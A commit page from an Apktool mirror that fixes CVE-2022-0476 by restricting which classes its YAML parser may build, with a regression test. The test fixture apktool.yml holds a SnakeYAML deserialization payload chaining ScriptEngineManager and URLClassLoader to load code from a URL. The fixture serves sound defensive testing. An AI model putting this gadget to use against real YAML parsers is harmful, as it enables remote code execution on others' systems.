ReVanced-Mirror
/
Apktool
mirror of https://github.com/revanced/Apktool.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

Preventing instantiation of untrusted classes. (#2760 - CVE-2022-0476) 

* fix: enforce allowable classes during yaml parsing

* fix: rename class to reference escaping nature of strings

* test: assertion for parsing malicious yaml
This commit is contained in:
Connor Tumbleson 2022-02-19 09:12:04 -05:00 committed by GitHub
parent a269a8e0d5
commit 4065717b45
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
6 changed files with 108 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
brut.apktool/apktool-lib/src/main/java/brut/androlib/meta/StringExConstructor.java → brut.apktool/apktool-lib/src/main/java/brut/androlib/meta/ClassSafeConstructor.java
View File

@ -18,13 +18,38 @@ package brut.androlib.meta;
import org.yaml.snakeyaml.constructor.AbstractConstruct;
import org.yaml.snakeyaml.constructor.Constructor;
import org.yaml.snakeyaml.error.YAMLException;
import org.yaml.snakeyaml.nodes.Node;
import org.yaml.snakeyaml.nodes.ScalarNode;
import org.yaml.snakeyaml.nodes.Tag;
import java.util.ArrayList;
import java.util.List;
public class StringExConstructor extends Constructor {
public StringExConstructor() {
public class ClassSafeConstructor extends Constructor {
protected final List<Class<?>> allowableClasses = new ArrayList<>();
public ClassSafeConstructor() {
this.yamlConstructors.put(Tag.STR, new ConstructStringEx());
this.allowableClasses.add(MetaInfo.class);
this.allowableClasses.add(PackageInfo.class);
this.allowableClasses.add(UsesFramework.class);
this.allowableClasses.add(VersionInfo.class);
}
protected Object newInstance(Node node) {
if (this.yamlConstructors.containsKey(node.getTag()) || this.allowableClasses.contains(node.getType())) {
return super.newInstance(node);
}
throw new YAMLException("Invalid Class attempting to be constructed: " + node.getTag());
}
protected Object finalizeConstruction(Node node, Object data) {
if (this.yamlConstructors.containsKey(node.getTag()) || this.allowableClasses.contains(node.getType())) {
return super.finalizeConstruction(node, data);
}
return this.newInstance(node);
}
private class ConstructStringEx extends AbstractConstruct {

4
brut.apktool/apktool-lib/src/main/java/brut/androlib/meta/StringExRepresent.java → brut.apktool/apktool-lib/src/main/java/brut/androlib/meta/EscapedStringRepresenter.java
View File

@ -19,8 +19,8 @@ package brut.androlib.meta;
import org.yaml.snakeyaml.nodes.Node;
import org.yaml.snakeyaml.representer.Representer;
public class StringExRepresent extends Representer {
public StringExRepresent() {
public class EscapedStringRepresenter extends Representer {
public EscapedStringRepresenter() {
RepresentStringEx representStringEx = new RepresentStringEx();
multiRepresenters.put(String.class, representStringEx);
representers.put(String.class, representStringEx);

4
brut.apktool/apktool-lib/src/main/java/brut/androlib/meta/MetaInfo.java
View File

@ -43,11 +43,11 @@ public class MetaInfo {
DumperOptions options = new DumperOptions();
options.setDefaultFlowStyle(DumperOptions.FlowStyle.BLOCK);
StringExRepresent representer = new StringExRepresent();
EscapedStringRepresenter representer = new EscapedStringRepresenter();
PropertyUtils propertyUtils = representer.getPropertyUtils();
propertyUtils.setSkipMissingProperties(true);
return new Yaml(new StringExConstructor(), representer, options);
return new Yaml(new ClassSafeConstructor(), representer, options);
}
public void save(Writer output) {

50
brut.apktool/apktool-lib/src/test/java/brut/androlib/yaml/MaliciousYamlTest.java Normal file
View File

@ -0,0 +1,50 @@
/*
* Copyright (C) 2010 Ryszard Wiśniewski <brut.alll@gmail.com>
* Copyright (C) 2010 Connor Tumbleson <connor.tumbleson@gmail.com>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package brut.androlib.yaml;
import brut.androlib.Androlib;
import brut.androlib.BaseTest;
import brut.androlib.TestUtils;
import brut.androlib.options.BuildOptions;
import brut.common.BrutException;
import brut.directory.ExtFile;
import brut.util.OS;
import org.junit.BeforeClass;
import org.junit.Test;
import org.yaml.snakeyaml.constructor.ConstructorException;
import java.io.File;
public class MaliciousYamlTest extends BaseTest {
@BeforeClass
public static void beforeClass() throws Exception {
TestUtils.cleanFrameworkFile();
sTmpDir = new ExtFile(OS.createTempDirectory());
sTestNewDir = new ExtFile(sTmpDir, "cve20220476");
LOGGER.info("Unpacking cve20220476...");
TestUtils.copyResourceDir(MaliciousYamlTest.class, "yaml/cve20220476/", sTestNewDir);
}
@Test(expected = ConstructorException.class)
public void testMaliciousYamlNotLoaded() throws BrutException {
BuildOptions buildOptions = new BuildOptions();
File testApk = new File(sTmpDir, "cve20220476.apk");
new Androlib(buildOptions).build(sTestNewDir, testApk);
}
}

4
brut.apktool/apktool-lib/src/test/resources/yaml/cve20220476/AndroidManifest.xml Normal file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" android:compileSdkVersion="30" android:compileSdkVersionCodename="11" package="com.ibotpeaches.cve20220476" platformBuildVersionCode="30" platformBuildVersionName="11">
<application android:debuggable="true" android:forceQueryable="true">
</application>
</manifest>

23
brut.apktool/apktool-lib/src/test/resources/yaml/cve20220476/apktool.yml Normal file
View File

@ -0,0 +1,23 @@
!!brut.androlib.meta.MetaInfo
apkFileName: cve20220476.apk
compressionType: false
some_var: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["https://127.0.0.1:8000"]]]]
doNotCompress:
- resources.arsc
isFrameworkApk: false
packageInfo:
forcedPackageId: '127'
renameManifestPackage: null
sdkInfo:
minSdkVersion: '25'
targetSdkVersion: '30'
sharedLibrary: false
sparseResources: false
usesFramework:
ids:
- 1
tag: null
version: 2.6.1-ddc4bb-SNAPSHOT
versionInfo:
versionCode: null
versionName: null